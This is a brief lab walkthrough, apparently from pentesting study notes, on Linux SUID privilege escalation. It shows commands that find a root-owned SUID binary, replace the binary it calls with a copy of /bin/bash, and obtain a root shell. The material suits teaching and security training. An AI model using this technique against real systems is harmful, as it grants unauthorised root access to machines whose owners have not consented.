SUID

🗒️ SUID (Set owner User ID) - is a type of special access permission given to a file. A file with SUID always executes as its the owner, regardless of the user passing the command.

Allows unprivileged users to run scripts or binaries with root permissions, and it's limited to the execution of that specific binary.
This is not privilege escalation, but can be used to obtain an elevated session
- e.g. the sudo binary
The exploitation of SUID binaries to get privesc depends on:
- the owner of the SUID file - e.g. look for root user's SUID binaries
- access permissions - x executable permissions are required to execute the SUID binary

#Exploitation

ls -al
drwxr-xr-x 1 student student 4096 Sep 22  2018 .
drwxr-xr-x 1 root    root    4096 Sep 22  2018 ..
-rw-r--r-- 1 root    root      88 Sep 22  2018 .bashrc
-r-x------ 1 root    root    8296 Sep 22  2018 greetings
-rwsr-xr-x 1 root    root    8344 Sep 22  2018 welcome

📌 welcome file has the SUID permission applied(in the permissions tab there is a s mentioned which means suid permission

./greetings
	bash: ./greetings: Permission denied
./welcome
	Welcome to Attack Defense Labs

file welcome

welcome: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2,for GNU/Linux 3.2.0, BuildID[sha1]=199bc8fd6e66e29f770cdc90ece1b95484f34fca, not stripped

strings welcome

It calls greetings binary

rm greetings
cp /bin/bash greetings
./welcome

Here we have removed the greeting binary and made a same binary with the same name and we have given the content through which we can get a /bin/bash session

PreviousCron Jobs Nextchkrootkit 0.49

Last updated 1 year ago